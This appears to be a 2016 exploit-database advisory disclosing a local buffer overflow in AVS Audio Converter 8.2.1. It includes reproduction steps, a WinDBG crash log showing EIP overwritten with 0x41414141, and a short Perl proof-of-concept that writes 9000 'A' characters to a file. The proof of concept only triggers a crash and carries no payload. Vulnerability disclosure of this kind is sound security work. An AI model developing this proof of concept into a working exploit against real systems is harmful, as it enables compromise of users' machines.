AVS Audio Converter 8.2.1 – Buffer Overflow Vulnérability



EKU-ID: 5874 CVE: OSVDB-ID:
Author: ZwX Published: 2016-09-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


AVS Audio Editor is an audio file editor of its primary function is for editing audio files. It is able to cut, join, combine or split audio files. All these operations are done with great precision to the hundredth of a second. You can work with files in .wav formats, Mp3, Pcm, M4A, Flac and many others.
  
(Copy of the Vendor Homepage: http://www.avs4you.com/ )
  
Technical Details & Description:
================================
A buffer overflow vulnerability has been discovered in the official software AVS Audio Converter V8.2.1.
The vulnerability allows local attackers to overwrite registers to compromise the local software process.
  
Vulnerability classic buffer overflow is in the AVS Audio Converter. An attacker can manipulate the
bit EIP register to execute the next instruction of their choice. Attackers can eg
execute arbitrary code with the privileges of the process. The attacker has a large unicode string to crush
the EIP register process. Finally, the attacker is able to process the takeover by a crushing of the
active program process to compromise the computer system.
  
  
Proof of Concept (PoC):
=======================
The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
  
Manual steps to reproduce the vulnerability ...
1. AVS Audio Converter.exe    
2. Run the code in perl and a file format (.txt) will create
3. Open the file (.txt) and copy paste characters AAAAAAAAAAAAAA...... in input "Output Folder" and click "Browse"
4. Software will crash with Access violation
5. Successful reproduce of the local buffer overflow vulnerability!
  
--- Debug Session Logs [WinDBG] ---
Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=77db38a0 esi=00000000 edi=00000000
eip=41414141 esp=0014f578 ebp=0014f598 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
41414141 ??              ???
  
0:000> d 0014fab4
0014fab4  41414141
0014fab8  41414141
0014fabc  41414141
0014fac0  41414141
0014fac4  41414141
0014fac8  41414141
0014facc  41414141
0014fad0  41414141
0014fad4  41414141
0014fad8  41414141
0014fadc  41414141
0014fae0  41414141
0014fae4  41414141
0014fae8  41414141
0014faec  41414141
0014faf0  41414141
0014faf4  41414141
0014faf8  41414141
0014fafc  41414141
0014fb00  41414141
0014fb04  41414141
0014fb08  41414141
0014fb0c  41414141
0014fb10  41414141
0014fb14  41414141
0014fb18  41414141
0014fb1c  41414141
0014fb20  41414141
0014fb24  41414141
0014fb28  41414141
0014fb2c  41414141
0014fb30  41414141
  
  
--- Poc : Eploit Perl ---
#!/usr/bin/perl
  
my $Buff = "\x41" x 9000;
  
open(MYFILE,'>>File.txt');
print MYFILE $Buff;
close(MYFILE);
  
print " POC Created by ZwX\n";
  
  
Domain:     www.zwx.fr
Contact:    msk4@live.fr        
Social:     twitter.com/XSSed.fr
Feeds:      www.zwx.fr/feed/
Advisory:   www.vulnerability-lab.com/show.php?user=ZwX
            packetstormsecurity.com/files/author/12026/
                        0day.today/author/27461